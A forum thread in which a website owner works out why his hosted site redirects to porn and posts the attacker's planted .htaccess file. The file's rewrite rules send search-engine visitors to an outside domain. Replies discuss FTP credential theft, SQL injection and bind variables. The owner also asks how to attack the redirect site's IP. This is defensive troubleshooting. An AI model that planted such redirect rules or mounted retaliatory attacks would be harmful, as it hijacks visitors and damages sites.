Announcement

Collapse
No announcement yet.

Virus on my web server? ( attempt 2)

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Time
  • Show
Clear All
new posts
Previous template Next
  • #1

    Virus on my web server? ( attempt 2)

    So I have a site hosted with dreamhost. We had it hacked and bad things were inserted in the code, which made our site link to porn.. yay.
    I ended up deleting all the files to the point of the root of the server containing nothing, then uploaded new files, which I typed myself in plain HTML/PHP.
    The issue is that every link I have on the site will again turn into porn links. on the 7th click, the links direct to porn. The link when viewing the source is fine, the source code when re-downloading it from the server is fine too, yet there are still porn links coming up. How could this be?..
    I scanned my local computer with AVG, and it found nothing.. also the porn links only appear on my site, not on other sites, so it must reside there. Dreamhost tech support has gotten back to me once telling me that it was a password exploit ( I have no idea how, but I did change the passwords to the site as soon as we found out).. but did not offer any word on how to get rid of the porn links.
    Another site I host is also available with the same login, and is now tagged by google as a known exploit site. Al it now contains is a simple 5 line HTML file, which has no evil in it, and the php picture gallery which dreamhost has a one click install. I updated the gallery and think all old code from it has been deleted.
    Since dreamhost is not getting back to me, I hope someone here has an idea what is going on. I checked for running processes on the server under my username, and it only has bash and ps listed .. I can link to the sites, if anyone here thinks they can pinpoint what is going on .

    thanks
    We have enough youth - What we need is a fountain of smart!


    i7-920, 6GB DDR3-1600, HD4870X2, Dell 27" LCD
    Tags: None
  • #2
    well, finally I get somewhere..
    seems what happened was that some @$$ in belarus got in via FTP using my login/password.. no idea how he obtained such.
    once in, he tacked on the <script>'s , which i cannot post here, as everything blocks access for you to see them, on most every .php /.htm file. Those I got rid off easily.. but the main culprit, which i did not spot was the .htaccess file, which was hiding away in the root of my account
    Code:
    cat .htaccess
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://2k90.cn/in.php [R=301,L]
    why dreamhost support never suggested looking there, until today, is beyond me. their last reply took them 4 days ( blaming holidays)
    I, not being a linux sysadmin, did not know what the .htaccess file was, it was next to other files such as my .bash and such, so i just assumed it being a regular config file, not an "overwrite your web server settings" file. So to any web hosting people out there, remember to check said file, if your site is behaving badly.
    Also, if anyone know how to firebomb the ip of the site, which it directs to, I am all ears
    We have enough youth - What we need is a fountain of smart!


    i7-920, 6GB DDR3-1600, HD4870X2, Dell 27" LCD

    Comment

    • #3
      Glad you got it solved. All my servers are Windows, but I'll be remembering that one!
      FT.

      Comment

      • #4
        It actually sounds more like a SQL injection attack vs an FTP hack.

        SQL injection - Wikipedia
        http://en.wikipedia.org/wiki/SQL_injection


        The script links in the code are the dead giveaway. While SQL Injection attacks are less common with MySQL they are possible.

        Make sure you search you databases for the link/script phrases to make sure it was not an injection attack. If it was you will have to tweak your SQL code to prevent it.

        As for FTP...with regular FTP your username and password are sent in clear text across the internet. If a hacker can gain access to your packets while you are FTP'ing (like through WiFi) then it is very easy to steal FTP information. You should check with Dreamhost to see if there is a secure FTP option if you are worried about your information getting stolen.
        Last edited by Jammrock; 29 December 2009, 17:58.
        “Inside every sane person there’s a madman struggling to get out”
        –The Light Fantastic, Terry Pratchett

        Comment

        • #5
          The ONLY sure-fire way to prevent sql injection is to use bind variables.
          If you code using bind variables then you can't be sql injected because the input string is not passed to the sql parser/compiler along with the query. It is processed later.

          http://www.metatitan.com/php/16/prot...injection.html

          404 NOT FOUND | 電話占い失敗あるある
          http://www.dev-exchange.com/cms_view_article.php?aid=10
          電話占いでよくある失敗談。気付かないうちに間違いや後悔することがたくさん。


          Last edited by cjolley; 29 December 2009, 15:24. Reason: better link, and another
          Chuck
           秋音的爸爸

          Comment

          • #6
            And the obligatory cartoon related to SQL injection seems appropriate here:
            Exploits of a Mom
            http://xkcd.com/327/
            pixar
            Dream as if you'll live forever. Live as if you'll die tomorrow. (James Dean)

            Comment

            • #7
              :


              Though, I must add-> Forget "sanitize input" There are people out there who are smarter than you, or anyone you know. Just use bind variables.
              Chuck
               秋音的爸爸

              Comment

              • #8
                I really don't have much of anything using SQL, mostly just logging visitors, not letting them input stuff. Will a SQL injection somehow give root access to my account?

                On an interesting note. One of our resellers, who we linked to on the site runs his own site on a different host, no logins/passwords are the same, yet his site was attacked just the same. He claims he somehow got it from our site.. I am not sure how that would work

                I did have phpbb and some other toys installed back when I just got the account, which were just sitting there.. I guess it is possible that there was a security issue with those, since I never updated them since I installed them, as I never used/linked to them.. that was 3 years ago ops:


                I have changed all dreamhost accounts to not allow FTP access, only SFTP, and I will go through any of my code dealing with inserting data in a database to bind the variables.
                We have enough youth - What we need is a fountain of smart!


                i7-920, 6GB DDR3-1600, HD4870X2, Dell 27" LCD

                Comment

                Previous template Next
                Working...
                X